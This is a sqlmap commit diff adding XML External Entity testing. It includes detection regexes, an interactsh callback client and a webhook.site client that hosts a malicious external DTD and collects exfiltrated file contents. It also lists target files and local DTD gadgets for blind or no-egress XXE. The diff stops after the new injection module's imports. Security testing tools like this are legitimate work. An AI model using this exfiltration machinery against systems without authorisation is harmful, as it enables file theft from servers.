Adding support for --xxe

This commit is contained in:
Miroslav Štampar 2026-07-04 09:53:04 +02:00
parent 16c8909a0c
commit 5fa2da5eae
14 changed files with 1413 additions and 16 deletions

View file

@ -162,8 +162,8 @@ df768bcb9838dc6c46dab9b4a877056cb4742bd6cfaaf438c4a3712c5cc0d264 extra/shutils/
1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 extra/vulnserver/__init__.py
9af5fdfa8b2425d404d86ab08d3644caa95bcf77605551f5da482a59d1e54a22 extra/vulnserver/vulnserver.py
a2bf70d7f87c3a4e0675c0bad54119a4e04efa6ea2730a8338d5aebcd995630e lib/controller/action.py
736715a73941a06e5d3d349dd01a1f1b171f54eb4c374c6752b2cc44b0977ffe lib/controller/checks.py
2086100cd7a78a4e8c12d72bd4f5b414ec6b3f49926e83285494534140e60ce7 lib/controller/controller.py
0d1072ac052b65fca6da9975238b6f8816bc78603631b68ada4c7aea97f060e4 lib/controller/checks.py
00d56cc59757cc3f3073ac20735ac9954ff06242b9433a96bd4186c090094db3 lib/controller/controller.py
d69e84f1648cdb907f5d2dd454f03874a4613752b07867510145d51d84b3c56f lib/controller/handler.py
1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/controller/__init__.py
48ffe93d61734e16c3b20153b51595853d9ac1fbcf0b537e0e61e957b0c0bfa6 lib/core/agent.py
@ -181,15 +181,15 @@ c2db614a3ce7dda889152bea8bd6d709e5d8c2b556741fdbfe44469f27ce266b lib/core/enums
5387168e5dfedd94ae22af7bb255f27d6baaca50b24179c6b98f4f325f5cc7b4 lib/core/exception.py
1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/core/__init__.py
914a13ee21fd610a6153a37cbe50830fcbd1324c7ebc1e7fc206d5e598b0f7ad lib/core/log.py
47c9828bdfa606a02f07925539d7af55c5eaf1fda61d05ecc40f73d77df036f9 lib/core/optiondict.py
3ac60716cf1c619b80038acb8b213c728cc607e7c5a387911e01635a23fbc92b lib/core/option.py
23852bdfadfb4bd5663302a63bdcc7227c0314fbdea884167d58ca21cda9fb09 lib/core/optiondict.py
0caac9b4af2cc50321a4d8126d92481ad0b092af2075e7efa19bccef529986fb lib/core/option.py
21b2b1745107c211fc7593923a3da7a808d40763c00091c28de5f7c129bcf3bc lib/core/patch.py
49c0fa7e3814dfda610d665ee02b12df299b28bc0b6773815b4395514ddf8dec lib/core/profiling.py
0c36a65b6237732eb001d333f80f0c58c088ff01ae80cf07e4dcc6da2a806364 lib/core/readlineng.py
9bf174058f15d14e24e94f9aaf42df045119d3617c6c54bd2f3af79b462f331d lib/core/replication.py
0b8c38a01bb01f843d94a6c5f2075ee47520d0c4aa799cecea9c3e2c5a4a23a6 lib/core/revision.py
888daba83fd4a34e9503fe21f01fef4cc730e5cde871b1d40e15d4cbc847d56c lib/core/session.py
6f4a6f82360addb01fb9581a67f67df30a2d44606b631bf3e1dc026e46f83e55 lib/core/settings.py
d974c44979d7699feda3eafeb1baee9618cb6dbe27b144a6d36bec95527c5cee lib/core/settings.py
c7804223319e18eb0b8e2cbf0a8b6896d1cefb7b0b1a2e9f1cf826a8a3b56750 lib/core/shell.py
a2e98a94b231432736d6b304fc75525c8b5fdb4768c418387c5b4c1a610dad64 lib/core/subprocessng.py
15d36cdac9389d0a54a6c33fbb89f32bb65e303f50de573773dcb6d4618bca64 lib/core/target.py
@ -200,7 +200,7 @@ b9aacb840310173202f79c2ba125b0243003ee6b44c92eca50424f2bdfc83c02 lib/core/unesc
2400e465fa4d13e4c32795910878c71ff212e4361b46428d57ce43983f5e997c lib/core/wordlist.py
1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/__init__.py
54bfd31ebded3ffa5848df1c644f196eb704116517c7a3d860b5d081e984d821 lib/parse/banner.py
fef119c6f3f2fe6a092112fd832d645c58e4c3c2af0bd97ace4487372c1e3574 lib/parse/cmdline.py
6d2b663807178b4eed0060ed22cde5a94d1b63b7f1ce54e401f709acfd2344c0 lib/parse/cmdline.py
925a068efa1885fa40671414a887c088f2aafbe8cb76f01286e6bde3f624dac1 lib/parse/configfile.py
c5b258be7485089fac9d9cd179960e774fbd85e62836dc67cce76cc028bb6aeb lib/parse/handler.py
5c9a9caee948843d5537745640cc7b98d70a0412cc0949f59d4ebe8b2907c06c lib/parse/headers.py
@ -215,17 +215,19 @@ bc61bc944b81a7670884f82231033a6ac703324b34b071c9834886a92e249d0e lib/request/ch
4fd1957e31b14e7670b09d85a634fa6772a1cd90babe149f39a1c945fe306f0a lib/request/comparison.py
4a3b997a83b1724e8bd025be95ec5d84c6bf41d533ba097fcab1eab763352111 lib/request/connect.py
8e06682280fce062eef6174351bfebcb6040e19976acff9dc7b3699779783498 lib/request/direct.py
a6b37b436838caeb197fea858d0a39fadbff4736256e741b5fcec1f28fcf1ce0 lib/request/dns.py
b1f07e0571f249eedf294b7827c530b0de8c0524d445b33fdb2d0a639c0f123a lib/request/dns.py
7344978ac1c52060716b7837c88a62768c6a445eafe189ea3232b8a498fdd038 lib/request/http2.py
92c81cc31ff4a396723242058fb2152c9e9745f8412d01ea74480b048a53af6c lib/request/httpshandler.py
1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/request/__init__.py
7a0ac2522213e756348fd871a7af74cc963bdc82f9d7ade57be5de42b5bf7cab lib/request/inject.py
fa51d6c8855049ac18b8c08dfea87df3ce0ebcc094d62322e9f615284bca54af lib/request/interactsh.py
ff15723c82e343eb95f4599d251165d478ca720afc8f5daaed3da44ea923df44 lib/request/keepalive.py
ada4d305d6ce441f79e52ec3f2fc23869ee2fa87c017723e8f3ed0dfa61cdab4 lib/request/methodrequest.py
43a7fdf64e7ba63c6b2d641c9f999a63c12ac23b43b64fedfce4e05b863de568 lib/request/pkihandler.py
b90feeb16e89a844427df42373b0139eb6f6cf3c48ccec32b3e3a3f540c2451e lib/request/rangehandler.py
fa347e74361904d052e4d5c958ebbdf080e4f7003176824a44786108b4d7afc6 lib/request/redirecthandler.py
1bf93c2c251f9c422ecf52d9cae0cd0ff4ea2e24091ee6d019c7a4f69de8e5eb lib/request/templates.py
58da8988a650c19e080980e545216158ba267065374c6812dabe0b22c1407bd2 lib/request/webhooksite.py
01600295b17c00d4a5ada4c77aa688cfe36c89934da04c031be7da8040a3b457 lib/takeover/abstraction.py
d3c93562d78ebdaf9e22c0ea2e4a62adb12f0ce9e9d9631c1ea000b1a07d04ab lib/takeover/icmpsh.py
1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/takeover/__init__.py
@ -255,6 +257,8 @@ f6678ac1342f8d234ed32ae69be5ac5d7837393e9348929ec029c9764c030e82 lib/techniques
c68f8259e0a89a556d049f227041849df584313bd1b5349b02f74a47778c901c lib/techniques/union/use.py
1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/techniques/xpath/__init__.py
c61816c9dba9f6cc2223aed1a923f95130979e5f0a88ec254ee667d955ed2734 lib/techniques/xpath/inject.py
1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/techniques/xxe/__init__.py
9a74178421ea0d98f7b27062e97eb55a12236deb893c2ef5f26fb6e734001f32 lib/techniques/xxe/inject.py
2403eda0e87835a2b402cbe6927a4d2737c4e87f3d4ef9b75e7685f3d2a9dc1e lib/utils/api.py
442555ab85277aff7c9e0cf465ea5b0d28395c326f68363449b2d3941f4b6de2 lib/utils/brute.py
da5bcbcda3f667582adf5db8c1b5d511b469ac61b55d387cec66de35720ed718 lib/utils/crawler.py
@ -609,7 +613,7 @@ fa85881aa8d082a65aeacb2b03fcb5d2abb1daa9a02ee24ff048d54fbc904b90 tests/test_dia
41bb0981cb7372753dbaa328c8be3678d328b736e6b97f7bd2573b465753af01 tests/test_dialect.py
993a2d4d87c4fbaf261663b069629acc95ee4405aa0c42cf5a8f39649fdb0fff tests/test_dicts.py
62a4386524d0ef269cba3bd6dcadc5a2a11c0d2bdd198773b79bcd8589324328 tests/test_dns_engine.py
ec58ba0849d90d2bb7580fe2b8b96cd8299ddfc25f14dc27d9de9d41f152c78a tests/test_dns_server.py
a9db98cbb4d16c42118fb6f612edd5bfedc77298e38d06d50e7ecc2faaa7fdc1 tests/test_dns_server.py
3dc788fd3adba8b6f766281e0a50025b1ee9150d80ab9a738c6c43f2eaf805b3 tests/test_dump_format.py
118d1987861ed0df978474329adce8c23009b3964210c13fbaf667e0019bbd15 tests/test_dump_jsonl.py
2bbe4b01f79992cfa8884651fc0a28dbd0e3abb0cbea9eb7eadf1f98ca3c3420 tests/test_encoding.py
@ -666,6 +670,7 @@ b03689c4dcca0e88a62a88784c61418f963c031d338a357dcc223560c8f9bd22 tests/test_use
93ef9944effc62d4f744c57bd643137c90fd92205c6a6cbe891e0e99efb80a7f tests/test_wafbypass.py
81bb6d7449f224fa337734ae361c1a340bf9a51768a854d6a1a6e718ed1263ca tests/test_wordlist.py
9d6dd551b751ab38200ab190c744ec0a9afa798b37f83b0078a4325ab3f80aec tests/test_xpath.py
140aa78a94fb97e364cead82149f5a2c33d576b721f39ae52a6352072d770793 tests/test_xxe.py
55eaefc664bd8598329d535370612351ec8443c52465f0a37172ea46a97c458a thirdparty/ansistrm/ansistrm.py
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 thirdparty/ansistrm/__init__.py
f597b49ef445bfbfb8f98d1f1a08dcfe4810de5769c0abfab7cdce4eebbfcae7 thirdparty/beautifulsoup/beautifulsoup.py

View file

@ -57,6 +57,7 @@ from lib.core.dicts import HEURISTIC_NULL_EVAL
from lib.core.enums import DBMS
from lib.core.enums import HASHDB_KEYS
from lib.core.enums import HEURISTIC_TEST
from lib.core.enums import POST_HINT
from lib.core.enums import HTTP_HEADER
from lib.core.enums import HTTPMETHOD
from lib.core.enums import NOTE
@ -86,6 +87,7 @@ from lib.core.settings import INFERENCE_EQUALS_CHAR
from lib.core.settings import LDAP_ERROR_REGEX
from lib.core.settings import SSTI_ERROR_REGEX
from lib.core.settings import XPATH_ERROR_REGEX
from lib.core.settings import XXE_ERROR_REGEX
from lib.core.settings import IPS_WAF_CHECK_PAYLOAD
from lib.core.settings import IPS_WAF_CHECK_RATIO
from lib.core.settings import IPS_WAF_CHECK_TIMEOUT
@ -1214,6 +1216,13 @@ def heuristicCheckSqlInjection(place, parameter):
if conf.beep:
beep()
if not conf.xxe and kb.postHint in (POST_HINT.XML, POST_HINT.SOAP) and re.search(XXE_ERROR_REGEX, page or ""):
infoMsg = "heuristic (XXE) test shows that the XML request body might be vulnerable to XML External Entity injection (rerun with switch '--xxe')"
logger.info(infoMsg)
if conf.beep:
beep()
kb.disableHtmlDecoding = False
kb.heuristicMode = False

View file

@ -529,8 +529,8 @@ def start():
checkWaf()
if any((conf.graphql, conf.nosql, conf.ldap, conf.xpath, conf.ssti)) and (conf.reportJson or conf.resultsFile):
singleTimeWarnMessage("'--report-json'/'--results-file' do not (yet) capture non-SQL technique (--graphql/--nosql/--ldap/--xpath/--ssti) findings; these are reported on the console only")
if any((conf.graphql, conf.nosql, conf.ldap, conf.xpath, conf.ssti, conf.xxe)) and (conf.reportJson or conf.resultsFile):
singleTimeWarnMessage("'--report-json'/'--results-file' do not (yet) capture non-SQL technique (--graphql/--nosql/--ldap/--xpath/--ssti/--xxe) findings; these are reported on the console only")
if conf.graphql:
from lib.techniques.graphql.inject import graphqlScan
@ -557,6 +557,11 @@ def start():
sstiScan()
continue
if conf.xxe:
from lib.techniques.xxe.inject import xxeScan
xxeScan()
continue
if conf.nullConnection:
checkNullConnection()

View file

@ -144,6 +144,7 @@ from lib.request.basicauthhandler import SmartHTTPBasicAuthHandler
from lib.request.chunkedhandler import ChunkedHandler
from lib.request.connect import Connect as Request
from lib.request.dns import DNSServer
from lib.request.dns import InteractshDNSServer
from lib.request.httpshandler import HTTPSHandler
from lib.request.keepalive import HTTPKeepAliveHandler
from lib.request.keepalive import HTTPSKeepAliveHandler
@ -935,10 +936,10 @@ def _setTamperingFunctions():
logger.warning(warnMsg)
# tamper scripts rewrite SQL injection payloads; the self-contained non-SQL engines
# (--graphql/--nosql/--ldap/--xpath/--ssti) do not run payloads through the tampering hook, so
# (--graphql/--nosql/--ldap/--xpath/--ssti/--xxe) do not run payloads through the tampering hook, so
# warn instead of silently ignoring the user's '--tamper'
if kb.tamperFunctions and any((conf.graphql, conf.nosql, conf.ldap, conf.xpath, conf.ssti)):
engine = next(_ for _ in ("graphql", "nosql", "ldap", "xpath", "ssti") if conf.get(_))
if kb.tamperFunctions and any((conf.graphql, conf.nosql, conf.ldap, conf.xpath, conf.ssti, conf.xxe)):
engine = next(_ for _ in ("graphql", "nosql", "ldap", "xpath", "ssti", "xxe") if conf.get(_))
warnMsg = "tamper scripts are applied to SQL injection payloads only and "
warnMsg += "will be ignored by the '--%s' engine" % engine
logger.warning(warnMsg)
@ -2581,6 +2582,26 @@ def _setDNSServer():
if not conf.dnsDomain:
return
from lib.core.settings import OOB_INTERACTSH_SERVERS
_requested = conf.dnsDomain.strip().lower()
if _requested in ("interactsh", "oast", "oob") or _requested in OOB_INTERACTSH_SERVERS:
infoMsg = "setting up interactsh-backed DNS exfiltration collector"
logger.info(infoMsg)
try:
conf.dnsServer = InteractshDNSServer(server=_requested if _requested in OOB_INTERACTSH_SERVERS else None)
conf.dnsServer.run()
conf.dnsDomain = conf.dnsServer.domain
except socket.error as ex:
errMsg = "there was an error while setting up "
errMsg += "the interactsh DNS collector ('%s')" % getSafeExString(ex)
raise SqlmapGenericException(errMsg)
infoMsg = "using interactsh DNS collector (exfiltration domain '%s')" % conf.dnsDomain
logger.info(infoMsg)
return
infoMsg = "setting up DNS server instance"
logger.info(infoMsg)

View file

@ -125,6 +125,9 @@ optDict = {
"ldap": "boolean",
"xpath": "boolean",
"ssti": "boolean",
"xxe": "boolean",
"oobServer": "string",
"oobToken": "string",
"timeSec": "integer",
"uCols": "string",
"uChar": "string",

View file

@ -20,7 +20,7 @@ from lib.core.enums import OS
from thirdparty import six
# sqlmap version (<major>.<minor>.<month>.<monthly commit>)
VERSION = "1.10.7.23"
VERSION = "1.10.7.24"
TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
@ -1071,6 +1071,73 @@ SSTI_ERROR_SIGNATURES = (
SSTI_ERROR_REGEX = r"(?i)(?:%s)" % '|'.join(regex for _, regex in SSTI_ERROR_SIGNATURES)
# XXE parser error signatures for detection and fingerprinting. Each tuple is
# (parser_family, regex_fragment). A match means the XML surface reached a real
# parser and the DOCTYPE/entity was processed (or rejected with a diagnostic) -
# useful both as an error-based oracle and to fingerprint the back-end parser.
XXE_ERROR_SIGNATURES = (
("libxml2 (PHP/lxml)", r"(?:failed to load (?:external entity|\")|xmlParseEntityRef|Entity '[^']*' not defined|EntityRef: expecting|Detected an entity reference loop|String not started expecting|StartTag: invalid element name|Start tag expected|Extra content at the end of the document|Premature end of data|error parsing DTD|internal error: Huge input lookup)"),
("PHP simplexml/DOM", r"(?:simplexml_load_string\(\)|DOMDocument::load(?:XML)?\(\)|SimpleXMLElement::__construct\(\))"),
("Java (Xerces/JAXP)", r"(?:org\.xml\.sax\.SAXParseException|com\.sun\.org\.apache\.xerces|javax\.xml\.stream\.XMLStreamException|The (?:entity|element type) \"[^\"]*\" was referenced|DOCTYPE is disallowed when the feature|External (?:DTD|parsed entities|Entity): failed|must be declared|had to be read but the maximum)"),
(".NET System.Xml", r"(?:System\.Xml\.XmlException|For security reasons DTD is prohibited|Reference to undeclared entity|An error occurred while parsing EntityName|XmlTextReaderImpl)"),
("Python expat", r"(?:xml\.parsers\.expat\.ExpatError|undefined entity|not well-formed \(invalid token\)|ExpatError)"),
("Ruby Nokogiri/REXML", r"(?:Nokogiri::XML::SyntaxError|REXML::ParseException|Entity .* not defined)"),
("Go encoding/xml", r"XML syntax error on line \d+"),
("Generic XML", r"(?:XML (?:parsing|parse|syntax) error|malformed XML|unexpected (?:end of|<) )"),
)
XXE_ERROR_REGEX = r"(?i)(?:%s)" % '|'.join(regex for _, regex in XXE_ERROR_SIGNATURES)
# Signatures indicating a hardened / XXE-safe parser posture (DTDs or external
# entities explicitly refused). Reported as "reachable but protected" - never a hit.
XXE_HARDENED_REGEX = r"(?i)(?:DOCTYPE is disallowed|DTD is prohibited|(?:external )?(?:DTD|entit(?:y|ies)) (?:are|is) (?:not (?:supported|allowed)|disabled|prohibited|forbidden)|loading of external|network access is not allowed|FEATURE_SECURE_PROCESSING|access to external)"
# Benign, low-entropy files used only to demonstrate file-read impact once XXE is
# confirmed. Deliberately NOT /etc/passwd (WAF honeypots key on "root:x:0:0") - a
# short host-identity file is enough to prove the read without tripping decoys.
# Out-of-band (interactsh) collector for blind XXE confirmation. Public default
# pool (best-effort, may rotate/be blocklisted by WAFs); override with --oob-server
# to point at a self-hosted interactsh-server. Correlation-id + nonce lengths match
# the interactsh defaults (subdomain = <20-char id><13-char nonce>.<server>).
OOB_INTERACTSH_SERVERS = ("oast.fun", "oast.pro", "oast.live", "oast.site", "oast.online", "oast.me")
# Public content-hosting + request-logging endpoint for blind-XXE OOB exfiltration
# (hosts the malicious external DTD and captures the file-bearing callback). Unlike
# interactsh it can serve arbitrary content; HTTP-only. Default exfil target is benign.
OOB_EXFIL_ENDPOINT = "https://webhook.site"
OOB_EXFIL_DEFAULT_FILE = "/etc/hostname"
OOB_CORRELATION_ID_LENGTH = 20
OOB_NONCE_LENGTH = 13
OOB_POLL_ATTEMPTS = 5
OOB_POLL_DELAY = 2
# Time-based blind tier: an external entity aimed at this non-routable RFC5737
# TEST-NET-1 host makes a fetching parser stall on the connection, so a large,
# reproducible response delay betrays otherwise-blind XXE with NO collector needed.
# The delay must exceed a DTD-processing control baseline by this many seconds.
XXE_BLACKHOLE_HOST = "192.0.2.1"
XXE_TIME_THRESHOLD = 5
XXE_IMPACT_FILES = (
("file:///etc/os-release", r"(?i)^(?:NAME|ID|VERSION)="), # high-signal, tried first
("file:///c:/windows/win.ini", r"(?i)\[(?:fonts|extensions|mci extensions|files)\]"),
("file:///etc/hostname", r"^[\w.-]{1,255}$"), # loosest pattern, tried last
)
# GoSecure dtd-finder local-DTD repurposing table for no-egress error-based XXE:
# an on-disk DTD is loaded, one of its parameter entities is redefined to smuggle
# an error/exfil primitive, so no outbound network is needed. (path, entity_name).
# Windows paths are community-sourced and remain UNVERIFIED vendor-side.
XXE_LOCAL_DTDS = (
("file:///usr/share/yelp/dtd/docbookx.dtd", "ISOamso"), # GNOME yelp - reliably repurposable
("file:///usr/share/xml/docbook/schema/dtd/4.5/docbookx.dtd", "ISOamso"), # docbook package
("file:///opt/IBM/WebSphere/AppServer/properties/sip-app_1_0.dtd", "connection"),
("file:///usr/share/xml/fontconfig/fonts.dtd", "constant"), # widespread but gadget is version-fragile
("file:///C:/Windows/System32/wbem/cim20.dtd", "SuperClass"), # Windows paths community-sourced, UNVERIFIED
("file:///C:/Windows/System32/wbem/wmi20.dtd", "extension"),
("file:///C:/Windows/System32/xwizards/xwizard.dtd", "ELEMENT"),
("jar:file:///usr/share/java/lotus-domino.jar!/schema/domino.dtd", "abbr"),
)
# Upper bound for SSTI value extraction (reserved for future use)
SSTI_MAX_LENGTH = 256

View file

@ -440,7 +440,7 @@ def cmdLineParser(argv=None):
help="Column values to use for UNION query SQL injection")
techniques.add_argument("--dns-domain", dest="dnsDomain",
help="Domain name used for DNS exfiltration attack")
help="Domain name used for DNS exfiltration attack (or 'interactsh' for zero-setup OOB)")
techniques.add_argument("--second-url", dest="secondUrl",
help="Resulting page URL searched for second-order response")
@ -790,6 +790,15 @@ def cmdLineParser(argv=None):
nonsql.add_argument("--ssti", dest="ssti", action="store_true",
help="Test for server-side template injection")
nonsql.add_argument("--xxe", dest="xxe", action="store_true",
help="Test for XML External Entity (XXE) injection")
nonsql.add_argument("--oob-server", dest="oobServer",
help="Out-of-band server for blind '--xxe' (default: public interactsh; 'none' to disable OOB)")
nonsql.add_argument("--oob-token", dest="oobToken",
help="Authentication token for a self-hosted '--oob-server'")
# Miscellaneous options
miscellaneous = parser.add_argument_group("Miscellaneous", "These options do not fit into any other category")

View file

@ -225,6 +225,60 @@ class DNSServer(object):
thread.daemon = True
thread.start()
class InteractshDNSServer(object):
"""DNS exfiltration collector backed by a public (or self-hosted) interactsh
interaction server instead of a locally-bound privileged :53 socket. This lets
the '--dns-domain' data-exfiltration technique run with zero infrastructure - no
delegated authoritative domain, no root/Administrator, no reachable listener -
by resolving lookups under the interactsh correlation domain and polling them
back. It presents the same run()/pop(prefix, suffix) surface as DNSServer, so it
is a drop-in for conf.dnsServer.
"""
def __init__(self, server=None):
from lib.request.interactsh import Interactsh, hasCrypto
if not hasCrypto():
raise socket.error("interactsh-backed DNS exfiltration requires the optional 'pycryptodome' package")
self._client = Interactsh(server=server)
if not self._client.registered:
raise socket.error("could not register with an interactsh interaction server")
self.domain = self._client.dnsDomain()
self._seen = set()
self._running = True
self._initialized = True
def run(self):
"""No background listener is needed - interactsh does the receiving."""
pass
def pop(self, prefix=None, suffix=None):
"""
Returns a captured DNS lookup name matching the given prefix/suffix
(prefix.<query result>.suffix.<correlation domain>), mirroring DNSServer.pop().
"""
retVal = None
for name in self._client.dnsNames():
if name in self._seen:
continue
if prefix is None and suffix is None:
self._seen.add(name)
retVal = name
break
if prefix and suffix and re.search(r"%s\..+\.%s" % (re.escape(prefix), re.escape(suffix)), name, re.I):
self._seen.add(name)
retVal = name
break
return retVal
if __name__ == "__main__":
server = None
try:

171
lib/request/interactsh.py Normal file
View file

@ -0,0 +1,171 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org)
See the file 'LICENSE' for copying permission
"""
import base64
import json
import time
from lib.core.common import randomStr
from lib.core.convert import getBytes
from lib.core.convert import getText
from lib.core.data import conf
from lib.core.data import logger
from lib.core.enums import HTTP_HEADER
from lib.core.settings import OOB_CORRELATION_ID_LENGTH
from lib.core.settings import OOB_INTERACTSH_SERVERS
from lib.core.settings import OOB_NONCE_LENGTH
# The interactsh client needs RSA-OAEP(SHA-256) + AES-256-CTR. pycryptodome is an
# optional dependency (sqlmap already uses it opportunistically in lib/utils/hash.py);
# without it the OOB tier is simply skipped rather than erroring.
try:
from Crypto.Cipher import AES
from Crypto.Cipher import PKCS1_OAEP
from Crypto.Hash import SHA256
from Crypto.PublicKey import RSA
_HAS_CRYPTO = True
except ImportError:
_HAS_CRYPTO = False
def hasCrypto():
return _HAS_CRYPTO
class Interactsh(object):
"""Minimal interactsh client: registers a per-scan RSA key with a public (or
self-hosted) interactsh server, hands out unique callback URLs, and polls for
the DNS/HTTP interactions they trigger. Interactions are RSA/AES encrypted on
the wire and decrypted locally, so the server operator never sees their content.
All HTTP goes through sqlmap's own request stack (proxy/timeout honoured)."""
def __init__(self, server=None, token=None):
self.server = None
self.token = token or conf.get("oobToken")
self.correlationId = randomStr(OOB_CORRELATION_ID_LENGTH, lowercase=True)
self.secret = randomStr(32, lowercase=True)
self.registered = False
self._key = None
self._dnsNonce = None
if not _HAS_CRYPTO:
return
self._key = RSA.generate(2048)
pubKey = getText(base64.b64encode(getBytes(self._key.publickey().export_key(format="PEM"))))
candidates = [server] if server else list(OOB_INTERACTSH_SERVERS)
for candidate in candidates:
if not candidate:
continue
body = json.dumps({"public-key": pubKey, "secret-key": self.secret, "correlation-id": self.correlationId})
if self._request("https://%s/register" % candidate, post=body):
self.server = candidate
self.registered = True
logger.debug("registered with OOB interaction server '%s'" % candidate)
break
def _request(self, url, post=None):
"""Direct request to the interactsh server (a fixed service, never the target).
Self-contained on urllib so it works regardless of sqlmap's request-stack init
order (it is also called during option setup, before getPage is usable); honours
--proxy and tolerates self-signed certs like the rest of sqlmap. Returns the
response body text on success, otherwise None."""
try:
import ssl
try:
from urllib.request import Request as _Request, build_opener, ProxyHandler, HTTPSHandler
except ImportError:
from urllib2 import Request as _Request, build_opener, ProxyHandler, HTTPSHandler
headers = {HTTP_HEADER.CONTENT_TYPE: "application/json"} if post is not None else {HTTP_HEADER.ACCEPT: "application/json"}
if self.token:
headers[HTTP_HEADER.AUTHORIZATION] = self.token
handlers = []
try:
context = ssl.create_default_context()
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE
handlers.append(HTTPSHandler(context=context))
except Exception:
pass
if conf.get("proxy"):
handlers.append(ProxyHandler({"http": conf.proxy, "https": conf.proxy}))
request = _Request(url, data=getBytes(post) if post is not None else None, headers=headers)
response = build_opener(*handlers).open(request, timeout=conf.get("timeout") or 30)
return getText(response.read())
except Exception as ex:
logger.debug("OOB request to '%s' failed: %s" % (url, getText(ex)))
return None
def url(self):
"""Return a fresh unique callback URL (host = correlationId + nonce)."""
nonce = randomStr(OOB_NONCE_LENGTH, lowercase=True)
return "http://%s%s.%s" % (self.correlationId, nonce, self.server)
def dnsDomain(self):
"""Stable domain suffix (host = correlationId + a fixed nonce) usable as an
exfiltration suffix - additional labels prepended by a payload still resolve
to this correlation id, so every DNS lookup under it is captured."""
if not self._dnsNonce:
self._dnsNonce = randomStr(OOB_NONCE_LENGTH, lowercase=True)
return "%s%s.%s" % (self.correlationId, self._dnsNonce, self.server)
def dnsNames(self):
"""Poll and return the fully-qualified names (minus the server suffix) of the
DNS lookups captured so far, e.g. 'prefix.<hex>.suffix.<correlationId><nonce>'."""
return [_.get("full-id") for _ in self.poll() if _.get("protocol") == "dns" and _.get("full-id")]
def poll(self):
"""Return the list of decrypted interaction records captured so far."""
if not self.registered:
return []
page = self._request("https://%s/poll?id=%s&secret=%s" % (self.server, self.correlationId, self.secret))
if not page:
return []
try:
response = json.loads(page)
except ValueError:
return []
retVal = []
data = response.get("data") or []
if data:
try:
aesKey = PKCS1_OAEP.new(self._key, hashAlgo=SHA256).decrypt(base64.b64decode(response["aes_key"]))
except Exception as ex:
logger.debug("OOB AES key decryption failed: %s" % getText(ex))
return []
for item in data:
try:
raw = base64.b64decode(item)
plain = AES.new(aesKey, AES.MODE_CTR, nonce=b"", initial_value=raw[:AES.block_size]).decrypt(raw[AES.block_size:])
retVal.append(json.loads(getText(plain)))
except Exception as ex:
logger.debug("OOB interaction decryption failed: %s" % getText(ex))
return retVal
def pollUntil(self, attempts, delay):
"""Poll repeatedly, returning as soon as any interaction is captured."""
for _ in range(attempts):
time.sleep(delay)
interactions = self.poll()
if interactions:
return interactions
return []
def close(self):
if self.registered:
body = json.dumps({"correlation-id": self.correlationId, "secret-key": self.secret})
self._request("https://%s/deregister" % self.server, post=body)
self.registered = False

View file

@ -0,0 +1,72 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org)
See the file 'LICENSE' for copying permission
"""
import json
from lib.core.data import logger
from lib.core.convert import getText
from lib.core.enums import HTTP_HEADER
from lib.core.settings import OOB_EXFIL_ENDPOINT
from lib.request.connect import Connect as Request
# webhook.site is used for blind-XXE OOB *exfiltration*: it can both serve a custom
# response (our malicious external DTD) AND log the request the target then makes
# (carrying the file content). interactsh cannot host arbitrary content, hence the
# separate backend. HTTP-only, free tier, no account required for basic tokens.
class WebhookSite(object):
"""Thin webhook.site client: mints tokens (optionally serving fixed content)
and reads back the requests captured on them. All calls go through sqlmap's
request stack (proxy/timeout honoured) straight to the service, not the target."""
def __init__(self):
# Exfil host is the public content-serving endpoint (its token API is
# service-specific, so --oob-server, which selects the interactsh *detection*
# server, deliberately does not repoint it).
self.endpoint = OOB_EXFIL_ENDPOINT.rstrip('/')
def _api(self, path, post=None):
try:
headers = {HTTP_HEADER.CONTENT_TYPE: "application/json"} if post is not None else {HTTP_HEADER.ACCEPT: "application/json"}
page, _, code = Request.getPage(url="%s%s" % (self.endpoint, path), post=post,
auxHeaders=headers, direct=True, silent=True, raise404=False)
return page if (code is None or code in (200, 201)) else None
except Exception as ex:
logger.debug("webhook.site request to '%s' failed: %s" % (path, getText(ex)))
return None
def newToken(self, content=None):
"""Create a token. When `content` is given the token serves it verbatim
(used to host the external DTD). Returns the token UUID or None."""
body = {"default_status": 200}
if content is not None:
body["default_content"] = content
body["default_content_type"] = "application/xml"
page = self._api("/token", post=json.dumps(body))
if page:
try:
return json.loads(page).get("uuid")
except ValueError:
pass
return None
def hostUrl(self, token):
"""Target-facing URL for a token. Plain HTTP - XML parsers (libxml) commonly
cannot fetch https external entities."""
host = self.endpoint.split("://", 1)[-1]
return "http://%s/%s" % (host, token)
def captured(self, token):
"""Return the list of request records captured on `token` (newest first)."""
page = self._api("/token/%s/requests?sorting=newest&per_page=50" % token)
if page:
try:
return json.loads(page).get("data") or []
except ValueError:
pass
return []

View file

@ -0,0 +1,8 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org)
See the file 'LICENSE' for copying permission
"""
pass

View file

@ -0,0 +1,699 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org)
See the file 'LICENSE' for copying permission
"""
import re
import time
from lib.core.common import beep
from lib.core.common import dataToOutFile
from lib.core.common import randomStr
from lib.core.common import singleTimeWarnMessage
from lib.core.convert import getBytes
from lib.core.convert import getText
from lib.core.convert import getUnicode
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.dicts import POST_HINT_CONTENT_TYPES
from lib.core.enums import CUSTOM_LOGGING
from lib.core.enums import HTTP_HEADER
